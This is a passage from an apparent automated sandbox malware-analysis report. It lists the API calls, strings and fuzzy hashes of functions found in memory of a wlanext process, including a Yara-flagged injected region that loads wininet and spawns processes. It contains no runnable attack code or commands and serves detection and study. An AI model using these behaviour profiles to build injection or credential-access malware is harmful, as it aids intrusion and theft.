                                                                                control_flow_graph 437 9905c-990a2 call 9bd20 440 990a8-990f8 call 9bdf0 call 8acf0 call 94e50 437->440 441 9917c-99182 437->441 448 99100-99111 Sleep 440->448 449 99113-99119 448->449 450 99176-9917a 448->450 451 9911b-99141 call 98c80 449->451 452 99143-99163 449->452 450->441 450->448 454 99169-9916c 451->454 452->454 455 99164 call 98e90 452->455 454->450 455->454
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00099108
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: net.dll$wininet.dll
                                                                                • API String ID: 3472027048-1269752229
                                                                                • Opcode ID: d05f1f9192abf183f72dd125e57ed312b7c173212cc877bb3dc4c8c4030d84ac
                                                                                • Instruction ID: 3351e132d25e6f89b4bf960086172b1eea100d7a9e3675a534dd1312f379fddd
                                                                                • Opcode Fuzzy Hash: d05f1f9192abf183f72dd125e57ed312b7c173212cc877bb3dc4c8c4030d84ac
                                                                                • Instruction Fuzzy Hash: B321A6B1500746AFCB24DF68C885FABB7B4FF48B00F10801DF62A9B246D775A550DBA4
                                                                                Function 0009A610 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(6E,?,00094CAF,00094CAF,?,00094536,?,?,?,?,?,00000000,00000000,?), ref: 0009A63D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: 6E
                                                                                • API String ID: 1279760036-729105364
                                                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                • Instruction ID: d399c79ce600c54796ba727e8f0d5ef5832450f9807bf4129da0dcb5d5a9b158
                                                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                • Instruction Fuzzy Hash: 59E012B2200208ABDB14EF99CC45EA777ACAF88754F118598BA085B242C630F9108AF0
                                                                                Function 0009A643 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A67D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID: .z`
                                                                                • API String ID: 3298025750-1441809116
                                                                                • Opcode ID: 7c9cd775f88a2e416991fa729ac62c95bbb6a2d6b23237fb40bc864ded1b0482
                                                                                • Instruction ID: b950ff5690d483ceb1087f7584adc38f8fb122cfbda9b60ee115cf77d2e3d39d
                                                                                • Opcode Fuzzy Hash: 7c9cd775f88a2e416991fa729ac62c95bbb6a2d6b23237fb40bc864ded1b0482
                                                                                • Instruction Fuzzy Hash: 15E0DFB81442815FDB00EF69D4848AB7BD1AF81314350899AF89D87613C235C65A9BA2
                                                                                Function 0009A650 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A67D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID: .z`
                                                                                • API String ID: 3298025750-1441809116
                                                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                • Instruction ID: bc8cfcb2c99894009c2587ad261f29bebf34a405a79fb46b909a0650bedf2706
                                                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                • Instruction Fuzzy Hash: 4DE04FB12002046BDB14DF99CC49EE777ACEF88750F014554FD0857252C630F910CAF0
                                                                                Function 00088308 Relevance: 3.1, APIs: 2, Instructions: 61threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: f9420b15ac48e6f8e0412ec754ec63907c4fc5812794d6f1f4b1ddae61453a07
                                                                                • Instruction ID: b8b446e9f3db850965a687365d8162680d56bf15b51db7187c079c3de754d16f
                                                                                • Opcode Fuzzy Hash: f9420b15ac48e6f8e0412ec754ec63907c4fc5812794d6f1f4b1ddae61453a07
                                                                                • Instruction Fuzzy Hash: EA01F931A802187AEB20B7949C43FFE776CAF42F54F044159FE44BB0C3DAA42A0687E1
                                                                                Function 00088310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: 9d4c15675667c892bffcd2134920723264ea120a0b7cfe49ad14a0b10ea46cd6
                                                                                • Instruction ID: 756c08928f44ea97a548b1d576e92f1d9b9861c61a57c45f328b22ac13de888a
                                                                                • Opcode Fuzzy Hash: 9d4c15675667c892bffcd2134920723264ea120a0b7cfe49ad14a0b10ea46cd6
                                                                                • Instruction Fuzzy Hash: C7018431A8022876EB20B6949C03FFE776C6B41F50F044115FF44BA1C2EA946A0647E6
                                                                                Function 00088393 Relevance: 3.0, APIs: 2, Instructions: 43threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: 60cb94ee4478815d1569139e4e878a6e3ec7664dc24abf25297d965043f7c8d2
                                                                                • Instruction ID: c4375ef212196cfe365c8c7b9e8838ff9e70859d08b7001d8249dd4b74f7bcba
                                                                                • Opcode Fuzzy Hash: 60cb94ee4478815d1569139e4e878a6e3ec7664dc24abf25297d965043f7c8d2
                                                                                • Instruction Fuzzy Hash: 5BF082317812243AE62575542C03FFE625CAB42F51F14412AFF44EA1C2EAC8690217F6
                                                                                Function 0008ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0008AD62
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 665aa5374d654e9f9cb4486f19f2e7f437621091addfb796b1c9b3220067dc7e
                                                                                • Instruction ID: 4cc34915bca2b20621477e70c37c9eb44b2bacb3199b709f60a965b127b592a3
                                                                                • Opcode Fuzzy Hash: 665aa5374d654e9f9cb4486f19f2e7f437621091addfb796b1c9b3220067dc7e
                                                                                • Instruction Fuzzy Hash: 660175B5E4020DA7DF10EBE0DD42FDDB3B8AB54308F004195E90997642F630EB14DB91
                                                                                Function 0009A6C0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A714
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInternalProcess
                                                                                • String ID:
                                                                                • API String ID: 2186235152-0
                                                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                • Instruction ID: 0b046d0cb849595b28bdb4a0987b3705507a4643545d0aab2cd55ed715ad0575
                                                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                • Instruction Fuzzy Hash: D901AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97251C630E851CBA4
                                                                                Function 00099190 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008F050,?,?,00000000), ref: 000991CC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: a2508597f785001f4e092b6b9c9eb41950eeb59147bc39573c54dbee2ee50ae3
                                                                                • Instruction ID: fb4ef361b822d3ff1b808260b5cb8a3b9c39fe2fa01eb090534f694250d9f97a
                                                                                • Opcode Fuzzy Hash: a2508597f785001f4e092b6b9c9eb41950eeb59147bc39573c54dbee2ee50ae3
                                                                                • Instruction Fuzzy Hash: E0E06D773812043AEA306599AC02FE7B29C9B81B24F14002AFA0DEA2C2D595F80142A4
                                                                                Function 0009A7A1 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1D2,0008F1D2,?,00000000,?,?), ref: 0009A7E0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: f4b5c10cc493ab303e0a5d696356c1ef60461c6a2b6d1e8dd3cae4033645b4e8
                                                                                • Instruction ID: 67fa30e3e792d03937ce2e1769576997f3215a697ae9002d404e75daac57fa4a
                                                                                • Opcode Fuzzy Hash: f4b5c10cc493ab303e0a5d696356c1ef60461c6a2b6d1e8dd3cae4033645b4e8
                                                                                • Instruction Fuzzy Hash: 97E06DB52402086BDA10DF98CC85EE737A99F89714F018456FD085B245CA74E9118BF1
                                                                                Function 0009A7B0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1D2,0008F1D2,?,00000000,?,?), ref: 0009A7E0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                • Instruction ID: 149503f86da4cb15340531ae8684167c00a67653fa40501ca9045837131c8761
                                                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                • Instruction Fuzzy Hash: 27E01AB12002086BDB10DF89CC85EE737ADAF89750F018164BA0857242C934E8108BF5
                                                                                Function 0008F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,00088D14,?), ref: 0008F6FB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: e797cb99377808158f649d51d76da159360094e6e4faa1bd49258ab048ae41c1
                                                                                • Instruction ID: ed2a3b96cedebc315b72bcabaabe6c3ce6085ee93f5df0a30e066fe22c75f057
                                                                                • Opcode Fuzzy Hash: e797cb99377808158f649d51d76da159360094e6e4faa1bd49258ab048ae41c1
                                                                                • Instruction Fuzzy Hash: 08D0A7717503093BEB10FAA49C03F6632CCAB45B04F490074F948D73C3ED50F4014165

                                                                                Non-executed Functions

                                                                                Function 00C07AD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 401encryptionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00C0B8D2: RpcImpersonateClient.RPCRT4(00000000), ref: 00C0B925
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C07BCE
                                                                                • GetLastError.KERNEL32 ref: 00C07BD4
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C07C3D
                                                                                • GetLastError.KERNEL32 ref: 00C07C43
                                                                                • CryptProtectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C07CA0
                                                                                • GetLastError.KERNEL32 ref: 00C07CA6
                                                                                • CryptProtectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C07D01
                                                                                • GetLastError.KERNEL32 ref: 00C07D07
                                                                                • RpcImpersonateClient.RPCRT4(00000000), ref: 00C07E34
                                                                                • LocalFree.KERNEL32(?,?,00000007,OnexIndicateResult,00000000,00000000), ref: 00C07ED6
                                                                                • LocalFree.KERNEL32(?,?,00000007,OnexIndicateResult,00000000,00000000), ref: 00C07EEF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CryptDataErrorLast$ClientFreeImpersonateLocalProtectUnprotect
                                                                                • String ID: OnexIndicateResult$x
                                                                                • API String ID: 2188033239-2692651971
                                                                                • Opcode ID: 4cc3719abe3315c2d1d31aafc98eafa4d7e3c020e63c283a4f3c98b7b6e0ec02
                                                                                • Instruction ID: 526f569309f6070ddd169e47fcb1b3275fb0a175caba641ac1c0aec2035b922b
                                                                                • Opcode Fuzzy Hash: 4cc3719abe3315c2d1d31aafc98eafa4d7e3c020e63c283a4f3c98b7b6e0ec02
                                                                                • Instruction Fuzzy Hash: C2E16BB1D04249AFDF19DFD4C884AEEBBB9BF04340F14456AE521A72A1D370AE85DF50
                                                                                Function 00C0AFB0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 239COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RpcStringBindingComposeW.RPCRT4(?,ncalrpc,00000000,00000000,Security=Impersonation Dynamic False,?), ref: 00C0B02D
                                                                                • RpcBindingFromStringBindingW.RPCRT4(?,?), ref: 00C0B075
                                                                                • RpcEpResolveBinding.RPCRT4(?,?), ref: 00C0B0AE
                                                                                • RpcBindingSetOption.RPCRT4(?,0000000B,00000001), ref: 00C0B0EB
                                                                                • RpcMgmtInqServerPrincNameW.RPCRT4(?,0000000A,?), ref: 00C0B12A
                                                                                • RpcBindingSetAuthInfoExW.RPCRT4(?,?,00000006,0000000A,00000000,00000000,?), ref: 00C0B1A4
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • RpcBindingSetAuthInfoW.RPCRT4(?,?,00000006,0000000A,00000000,00000000), ref: 00C0B1DA
                                                                                • RpcStringFreeW.RPCRT4(00000000,?,?,00000000,00C12520,00C12000), ref: 00C0B220
                                                                                • RpcStringFreeW.RPCRT4(00000000,?,?,00000000,00C12520,00C12000), ref: 00C0B22C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Binding$String$AuthFreeInfo$ComposeFromMessageMgmtNameOptionPrincResolveServerTrace
                                                                                • String ID: Security=Impersonation Dynamic False$ncalrpc
                                                                                • API String ID: 3881596699-2153043788
                                                                                • Opcode ID: 4780ed0b0e55207d91265e6dea173d21d61b7ca70b5ce826cdb663a6d2a07fb0
                                                                                • Instruction ID: 15153c644f399398bcf180fdec1f88d9e0ac5d1c8fd2fb635044a74fbd8a69a5
                                                                                • Opcode Fuzzy Hash: 4780ed0b0e55207d91265e6dea173d21d61b7ca70b5ce826cdb663a6d2a07fb0
                                                                                • Instruction Fuzzy Hash: 2681A075940248BEEB25CF54CC49FAFBBB6EB45704F150468FA24A62E1C7B2CE90DB14
                                                                                Function 00C0FA9E Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 98fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlStringFromGUID.NTDLL ref: 00C0FACA
                                                                                • RtlNtStatusToDosError.NTDLL ref: 00C0FAD1
                                                                                • memcpy.MSVCRT ref: 00C0FB16
                                                                                • RtlFreeUnicodeString.NTDLL(?,?,?,?), ref: 00C0FB2F
                                                                                • CreateFileW.KERNEL32(\\.\NativeWiFiP,?,00000000,00000000,00000003,40000000,00000000), ref: 00C0FB4C
                                                                                • GetLastError.KERNEL32(\\.\NativeWiFiP), ref: 00C0FB6A
                                                                                • BindIoCompletionCallback.KERNEL32 ref: 00C0FB83
                                                                                • GetLastError.KERNEL32 ref: 00C0FB8D
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00C0FB93
                                                                                  • Part of subcall function 00C10411: GetProcessHeap.KERNEL32(00C12000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10419
                                                                                  • Part of subcall function 00C10411: HeapAlloc.KERNEL32(00000000,00000008,00000000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0), ref: 00C10429
                                                                                  • Part of subcall function 00C10411: SetLastError.KERNEL32(00000008,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10437
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Last$HeapString$AllocBindCallbackCloseCompletionCreateFileFreeFromHandleProcessStatusUnicodememcpy
                                                                                • String ID: \\.\NativeWiFiP$\\.\NativeWiFiP\
                                                                                • API String ID: 2662263823-3014666177
                                                                                • Opcode ID: b61dfb7784bf2f6cb1ec75dc9bdce349f37d6ff59aff8e07be3a25e04bd17e2a
                                                                                • Instruction ID: 8da50c24c331742ee7035dc9cc8867adcbd08f398790e7e9014624cd5e6d51a1
                                                                                • Opcode Fuzzy Hash: b61dfb7784bf2f6cb1ec75dc9bdce349f37d6ff59aff8e07be3a25e04bd17e2a
                                                                                • Instruction Fuzzy Hash: 9A31B571900218BBCB219FB5DC44B9EBBB8EF44750F15456AF914E71A0D7B4CB82DB90
                                                                                Function 00C0BC8E Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 175COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RpcServerUseProtseqW.RPCRT4(ncalrpc,0000000A,00000000), ref: 00C0BCD7
                                                                                • RpcServerInqBindings.RPCRT4(00C089A2), ref: 00C0BD1F
                                                                                • RpcEpRegisterW.RPCRT4(00C089A2,00C089A2,?,IhvExtRpcServer), ref: 00C0BD63
                                                                                • RpcServerRegisterIfEx.RPCRT4(00C089A2,00000000,00000000,00000028,00000000,00C0BA7B), ref: 00C0BDC0
                                                                                • RpcServerRegisterAuthInfoW.RPCRT4(00000000,0000000A,00000000,00000000), ref: 00C0BDF9
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • RpcEpUnregister.RPCRT4(00C089A2,00C089A2,00000000), ref: 00C0BE46
                                                                                • RpcServerUnregisterIfEx.RPCRT4(00C089A2,00000000,00000000), ref: 00C0BE5B
                                                                                • RpcBindingVectorFree.RPCRT4(00C089A2), ref: 00C0BE6F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Server$Register$Unregister$AuthBindingBindingsFreeInfoMessageProtseqTraceVector
                                                                                • String ID: IhvExtRpcServer$ncalrpc
                                                                                • API String ID: 614777719-1482482307
                                                                                • Opcode ID: e8e937e7b2514245115e769e7eda432e9b15704b2801f6fe3ab9904a19ad4bd4
                                                                                • Instruction ID: db9600e70050b3cb063c865bc62556e592414d4c5f8e67d04dc473e23dd25232
                                                                                • Opcode Fuzzy Hash: e8e937e7b2514245115e769e7eda432e9b15704b2801f6fe3ab9904a19ad4bd4
                                                                                • Instruction Fuzzy Hash: 7C51AE34548384BEEB25CF65CC8CFDEBEA6AB06744F094059FA21962E1C371CE94DB14
                                                                                Function 00C0FBAF Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 96nativefileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00C10411: GetProcessHeap.KERNEL32(00C12000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10419
                                                                                  • Part of subcall function 00C10411: HeapAlloc.KERNEL32(00000000,00000008,00000000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0), ref: 00C10429
                                                                                  • Part of subcall function 00C10411: SetLastError.KERNEL32(00000008,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10437
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000008,00000000,00000000,SetDefaultKeyId), ref: 00C0FBF5
                                                                                • NtDeviceIoControlFile.NTDLL ref: 00C0FC16
                                                                                • NtWaitForSingleObject.NTDLL ref: 00C0FC2B
                                                                                • CloseHandle.KERNEL32(?), ref: 00C0FC3D
                                                                                • RtlNtStatusToDosError.NTDLL ref: 00C0FC84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHeap$AllocCloseControlCreateDeviceEventFileHandleLastObjectProcessSingleStatusWait
                                                                                • String ID: SetDefaultKeyId
                                                                                • API String ID: 2851205432-2492053462
                                                                                • Opcode ID: f6a884f34c34670014533c68a15e0635d6e448e9604013e46200b5b12a1e17c7
                                                                                • Instruction ID: 1a030003f66285839e6acd6c2506e16831cc938a580c22b51b9dbfd90c77aae5
                                                                                • Opcode Fuzzy Hash: f6a884f34c34670014533c68a15e0635d6e448e9604013e46200b5b12a1e17c7
                                                                                • Instruction Fuzzy Hash: F131A535600128BFEB219F64CC89BAEBB79FB49751F154428FD11D7290D7709D82DBA0
                                                                                Function 00C10276 Relevance: 15.1, APIs: 10, Instructions: 147nativefileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00C10411: GetProcessHeap.KERNEL32(00C12000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10419
                                                                                  • Part of subcall function 00C10411: HeapAlloc.KERNEL32(00000000,00000008,00000000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0), ref: 00C10429
                                                                                  • Part of subcall function 00C10411: SetLastError.KERNEL32(00000008,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10437
                                                                                • memcpy.MSVCRT ref: 00C1031F
                                                                                • memcpy.MSVCRT ref: 00C1033D
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00C12000,00C02A48,00000000,00000000), ref: 00C10351
                                                                                • NtDeviceIoControlFile.NTDLL ref: 00C10375
                                                                                • NtWaitForSingleObject.NTDLL ref: 00C1038A
                                                                                • CloseHandle.KERNEL32(00C02A48), ref: 00C1039C
                                                                                • RtlNtStatusToDosError.NTDLL ref: 00C103E5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHeapmemcpy$AllocCloseControlCreateDeviceEventFileHandleLastObjectProcessSingleStatusWait
                                                                                • String ID:
                                                                                • API String ID: 3829266998-0
                                                                                • Opcode ID: 6f155ffe2841dd5db81f560f9acd41f3b548975296837f130d74b1625e6fd67d
                                                                                • Instruction ID: 8f55d10446caaed231ca5921956c123515aee2665d1fc6f28bd6fe2afcb710bf
                                                                                • Opcode Fuzzy Hash: 6f155ffe2841dd5db81f560f9acd41f3b548975296837f130d74b1625e6fd67d
                                                                                • Instruction Fuzzy Hash: 9551C171600605AFCB24DF68CCC9BEFBBB5EB89300B644529F922D7251D7B0D980DB60
                                                                                Function 00C0FDE4 Relevance: 15.1, APIs: 10, Instructions: 138nativefileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00C0FE30
                                                                                • memcpy.MSVCRT ref: 00C0FE82
